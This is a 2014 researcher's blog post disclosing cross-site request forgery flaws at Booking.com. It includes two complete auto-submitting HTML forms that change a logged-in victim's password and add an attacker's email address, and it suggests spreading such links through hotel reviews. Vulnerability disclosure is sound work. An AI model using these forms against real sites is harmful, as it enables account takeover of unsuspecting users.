Thursday, October 9, 2014

Booking.com Account Take-Over CSRF Vulnerability

Hello, I'm Mohamed M. Fouad, an independent security researcher from Egypt. I have received acknowledgements from many firms, such as Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise and many more...


================================================

CAUTION

THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...




Booking.com is an online booking website established in 1996, based in Amsterdam, Netherlands, and since 2005 owned and operated by the United States based Priceline. Booking.com offers online accommodation booking.







Hello Guys!


Today I will show you how I discovered a number of critical security vulnerabilities at Booking.com. They can have a very harmful impact on all users: an attacker can force users to change their passwords, add alternative emails, or change anything else in their profile settings. These vulnerabilities can also be escalated to deface the whole site by posting malicious URLs in hotel review comments, so that every user who follows them has their account password changed.



A week or more ago, when I found that TripAdvisor had been hacked and its database breached, I decided to check the biggest travel website, Booking.com, which is used by people all over the world. When I checked it, I discovered that all of booking.com was vulnerable to CSRF attacks, which can lead to account hijacking by changing the victim's password via a CSRF attack.


The impact: you can change any details in the user's account settings, and this is the most critical point of this article. You can change the user's password, add other email addresses or credit cards, etc., or mark the victim's account for deletion. All of this can be done with just one click on a malicious URL.


This can also be done by adding a review (comment): if an attacker posts a rating review on a place containing a malicious URL, the attacker can change the victim's account password. The problem here is that no one can add a review for a hotel until they invite you (by email) to write one, after you have booked through them and stayed at the hotel. So I didn't try this part, because I lost all the emails I had received from them before. In this way an attacker could deface the whole site. I sent it to them, but I haven't received a reply yet.


Note: you will see that each request that does something on booking.com depends on an "op" parameter whose value is the action name (e.g. changepw, add_email, delete_account), with no anti-CSRF token present. Booking.com has a lot of vulnerabilities, but the most critical one is that you can change a user's password via a CSRF attack.

Below is the critical one!

==============================
Change Password CSRF Request:
==============================
<html>
<body onload="document.csrf.submit()">
<!-- Auto-submitted cross-site POST. The victim's browser attaches its
     booking.com session cookie; nothing in the body is a secret the
     attacker's page could not supply, so the server cannot tell this
     apart from a submission of its own account page. -->
<form action="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount"
      method="post" name="csrf">
<!-- "op" selects the server-side action; no anti-CSRF token field exists. -->
<input type="hidden" name="op" value="changepw">
<input type="hidden" name="lang" value="en-us">
<input type="hidden" name="username" value="">
<input type="hidden" name="reset_hash" value="">
<input type="hidden" name="error_url" value="">
<input type="hidden" name="password" value="hacked@2014">
<input type="hidden" name="password_confirm" value="hacked@2014">
</form>
</body>
</html>


==============================
Add Email CSRF Request:
==============================
<html>
<body onload="document.csrf.submit()">
<!-- Same pattern as the change-password request: only the "op" value
     and its parameters differ, and again no token is required. -->
<form action="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount"
      method="post" name="csrf">
<input type="hidden" name="op" value="add_email">
<input type="hidden" name="email" value="hacker@hotmail.com">
<input type="hidden" name="lang" value="en-us">
</form>
</body>
</html>

Hope you find it interesting and HAVE FUN with POC Video :)




Regards,





